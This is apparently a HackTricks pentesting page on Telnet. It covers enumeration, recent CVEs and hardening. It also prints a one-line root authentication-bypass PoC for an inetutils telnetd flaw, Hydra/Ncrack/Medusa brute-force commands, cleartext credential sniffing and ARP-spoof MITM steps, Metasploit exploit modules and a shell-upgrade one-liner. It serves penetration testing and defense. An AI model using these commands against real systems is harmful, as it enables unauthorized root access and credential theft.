23 - Pentesting Telnet

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Telnet is a network protocol that gives users an insecure way of accessing a computer over a network.

Default port: 23

23/tcp open  telnet

Enumeration

nc -vn <IP> 23

All the interesting enumeration can be done with nmap:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

The telnet-ntlm-info.nse script obtains NTLM information (Windows versions).

From the telnet RFC: In the TELNET Protocol there are various "options" that will be sanctioned and may be used with the "DO, DON'T, WILL, WON'T" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc.

I know it is possible to enumerate these options but I don't know how, so let me know if you know how.

Enumerate Telnet Options / Features

Telnet uses IAC + DO/DONT/WILL/WONT negotiation to enable options. You can see which options are in use by capturing the initial negotiation and by probing specific features.

Nmap option/feature probes

# Detect support for the Telnet ENCRYPT option
nmap -p 23 --script telnet-encryption <IP>

# Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build)
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force via NSE (alternative to Hydra/Medusa)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

The telnet-encryption script checks whether the ENCRYPT option is supported; some implementations historically handled this option incorrectly and were vulnerable, but the script only tests for support. telnet-ntlm-info exposes NTLM metadata (NetBIOS/DNS/OS build) when Microsoft Telnet NTLM authentication is enabled. telnet-brute is the NSE brute-force checker for Telnet.

Brute force

Configuration file

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

HackTricks Automatic Commands

Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for Telnet
Note: |
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
Name: Banner Grab
Description: Grab Telnet Banner
Command: nc -vn {IP} 23

Entry_3:
Name: Nmap with scripts
Description: Run nmap scripts for telnet
Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
Name: consoleless msf enumeration
Description: Telnet enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Recent Vulnerabilities (2022-2026)

  • CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860): Improper input validation in the telnet service lets remote attackers log in with hard-coded credentials and inject OS commands; fixed in firmware 1.04B05 or later.
  • CVE-2023-40478 – NETGEAR RAX30: Stack-based buffer overflow in the Telnet CLI passwd command allows network-adjacent code execution as root; authentication is required but can be bypassed.
  • CVE-2022-39028 – GNU inetutils telnetd: A two-byte sequence (0xff 0xf7 / 0xff 0xf8) can trigger a NULL-pointer dereference in telnetd, and repeated crashes can make inetd disable the service (DoS).

Keep these CVEs in mind during vulnerability assessment: if the target runs unpatched firmware or a legacy inetutils Telnet daemon, there may be an easy path to code execution or a disruptive DoS.

CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical)

Primitive: Telnet NEW_ENVIRON lets clients push environment variables during option negotiation; inetutils telnetd replaces %U in its login template with getenv("USER") and passes it straight to /usr/bin/login, allowing argv-level option injection (no shell expansion). Root cause: versions 1.9.3–2.7 expand %U without filtering, so a USER value that starts with - is parsed as a login flag. For example, %U becomes -f root, producing /usr/bin/login -h <hostname> "-f root" and bypassing authentication via login -f.

Exploit flow:

  1. Connect to the Telnet service and negotiate NEW_ENVIRON to set USER=-f root.
  2. telnetd builds the login argv with the attacker-controlled %U value.
  3. /usr/bin/login interprets -f root as "pre-authenticated user root" and spawns a root shell.

PoC

# Inject USER via NEW_ENVIRON and obtain a root shell
USER='-f root' telnet -a <ip>

Patch note: inetutils 2.7-2 introduces a sanitize() helper that rejects values starting with - or containing whitespace/metacharacters before substituting them into the login argv, blocking option injection. Detection/verification: identify exposed daemons with telnetd --version, dpkg -l | grep inetutils, systemctl status inetutils-telnetd, or netstat -tlnp | grep :23.
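As an added example (not code from the HackTricks page or from the inetutils project), a small Python parser for the option negotiation described in the enumeration section above: it lists the DO/DONT/WILL/WONT commands and subnegotiations in a captured stream and decodes NEW_ENVIRON so a defender can spot USER values that would reach login(1) as options, the same shapes the sanitize() fix rejects. Option numbers and the ENV_* codes are the RFC 854/1572 values; the sample bytes are constructed.

```python
IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254
CMD = {WILL: "WILL", WONT: "WONT", DO: "DO", DONT: "DONT"}
NEW_ENVIRON, ENV_IS, ENV_INFO, ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 39, 0, 2, 0, 1, 2, 3  # RFC 1572

def parse_negotiation(data: bytes):
    """Return (commands, subnegotiations): (name, option) for DO/DONT/WILL/WONT,
    ("CMD", code) for 2-byte commands such as EC 0xf7 / EL 0xf8, (option, payload) per SB..SE."""
    cmds, subs, i = [], [], 0
    while i + 1 < len(data):
        if data[i] != IAC:
            i += 1; continue                     # ordinary data byte
        c = data[i + 1]
        if c == IAC:                             # IAC IAC = escaped 0xff data byte
            i += 2
        elif c in CMD:                           # 3-byte option negotiation
            if i + 2 >= len(data): break         # truncated command
            cmds.append((CMD[c], data[i + 2])); i += 3
        elif c == SB:                            # IAC SB <option> ... IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            if end < 0: break                    # unterminated subnegotiation
            subs.append((data[i + 2], bytes(data[i + 3:end]))); i = end + 2
        else:                                    # 2-byte command (NOP, EC, EL, ...)
            cmds.append(("CMD", c)); i += 2
    return cmds, subs

def _token(p: bytes, i: int):
    """Read a NEW-ENVIRON name or value up to the next VAR/VALUE/USERVAR marker."""
    out = bytearray()
    while i < len(p) and p[i] not in (ENV_VAR, ENV_VALUE, ENV_USERVAR):
        if p[i] == ENV_ESC and i + 1 < len(p): i += 1   # ESC: next byte is literal
        out.append(p[i]); i += 1
    return out.decode("latin-1"), i

def decode_new_environ(payload: bytes) -> dict:
    """Decode a NEW-ENVIRON IS/INFO payload into {name: value}."""
    env, i = {}, 1
    if not payload or payload[0] not in (ENV_IS, ENV_INFO): return env
    while i < len(payload) and payload[i] in (ENV_VAR, ENV_USERVAR):
        name, i = _token(payload, i + 1)
        env[name], i = _token(payload, i + 1) if payload[i:i + 1] == bytes([ENV_VALUE]) else ("", i)
    return env

def suspicious_user_values(data: bytes) -> list:
    """USER values from NEW-ENVIRON with a leading '-' or whitespace (what inetutils' sanitize() rejects)."""
    users = [decode_new_environ(p).get("USER", "") for o, p in parse_negotiation(data)[1] if o == NEW_ENVIRON]
    return [u for u in users if u.startswith("-") or any(ch.isspace() for ch in u)]

# Constructed sample of a client's opening bytes: DO SUPPRESS-GO-AHEAD, WILL NAWS, WILL NEW-ENVIRON, then IS VAR "USER" VALUE "-f root"
SAMPLE = (bytes([IAC, DO, 3, IAC, WILL, 31, IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, ENV_IS,
                 ENV_VAR]) + b"USER" + bytes([ENV_VALUE]) + b"-f root" + bytes([IAC, SE]))
```

Feed it the first few hundred bytes of a client-to-server capture (for instance the bytes Wireshark shows under telnet.option) to see which options a client negotiates and whether any pushed USER value would be parsed as a login flag.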

Mitigations

  • Patch/update the affected packages immediately (e.g., Debian fixes are in 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, and 2:2.7-2).
  • Disable Telnet or restrict access to trusted management networks while patching.

Capturing credentials & Man-in-the-Middle

Telnet carries everything, including usernames and passwords, in clear text. Two quick ways to capture them:

# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A "tcp port 23 and not src host $(hostname -I | cut -d' ' -f1)"

# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)

For active MITM, combine ARP spoofing (e.g. arpspoof/ettercap) with the same sniffing filters to harvest passwords on switched networks.

Automated Brute-force / Password Spraying

# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

# Medusa (parallel hosts)
medusa -M telnet -H targets.txt -U users.txt -P passwords.txt -t 6 -f

Many IoT botnets (Mirai variants) still scan port 23 with small default-credential dictionaries; mimicking that logic can quickly identify weak devices.

Exploitation & Post-Exploitation

Metasploit has several useful modules:

  • auxiliary/scanner/telnet/telnet_version – banner & option enumeration.
  • auxiliary/scanner/telnet/brute_telnet – multithreaded bruteforce.
  • auxiliary/scanner/telnet/telnet_encrypt_overflow – RCE against flawed Solaris 9/10 Telnet (ENCRYPT option handling).
  • exploit/linux/mips/netgear_telnetenable – enables the telnet service with a crafted packet on many NETGEAR routers.

After obtaining a shell, remember that TTYs are usually 'dumb'; upgrade with python -c 'import pty;pty.spawn("/bin/bash")' or use the HackTricks TTY tricks.

Hardening & Detection (Blue team corner)

  1. Use SSH and disable the Telnet service entirely.
  2. If Telnet is required, restrict it to management VLANs only, enforce ACLs and wrap the daemon with TCP wrappers (/etc/hosts.allow).
  3. Replace legacy telnetd implementations with ssl-telnet or telnetd-ssl to add transport encryption, but this only protects data in transit; password guessing remains easy.
  4. Monitor outbound traffic to port 23; compromises often start reverse shells over Telnet to bypass strict HTTP egress filters.

References
